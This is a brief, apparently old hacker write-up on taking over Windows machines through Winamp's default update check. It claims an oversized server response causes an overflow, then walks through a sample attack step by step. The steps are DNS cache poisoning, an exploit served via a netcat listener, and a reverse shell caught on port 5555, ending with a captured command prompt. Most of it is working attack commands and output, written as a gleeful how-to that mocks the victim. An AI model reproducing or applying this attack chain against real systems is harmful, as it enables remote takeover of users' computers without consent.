How Hackers Take over Through Winamp!!






Winamp has an option, enabled by default, which checks on startup for
the latest version from www.winamp.com and will then notify the user of
a possible upgrade via messagebox..


Unfortunately, if it were to receive a huge response, the thread
parsing the data is thrown into an infinite loop and eventually the
exception dispatcher is called.. and then like most of the time under
windows, a big, bad, overflow occurs.. i am attaching the real example


Sample attack

=============



Nameserver - 192.168.0.1

attacker - 192.168.1.2

victim (windows machine) - 192.168.0.2



1) attacker poisons nameserver cache


192.168.1.2:

x@x:~$ ./p0ison 192.168.0.1 www.winamp.com 192.168.1.2





2) victim is now resolving www.winamp.com to attacker machine



192.168.0.2:

C:>nslookup www.winamp.com

Server: z3.names.int

Address: 192.168.0.1



Name: www.winamp.com

Address: 192.168.1.2





3) attacker fires up exploit as web daemon



192.168.1.2:

x@x:~$ (./wampexp 192.168.1.2 5555)|nc -l -p 80





4) attacker waits for connect-back by exploit



192.168.1.2:

x@x:~$ nc -l -p 5555





5) foolish winamp user opens winamp!



192.168.0.2:


opens winamp, prepares for The Weather Girls - It\'s

Raining Men.mp3



6) BOOJAH!@



192.168.1.2:



x@x:~$ nc -l -p 5555

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.



C:>


/// control over machine taken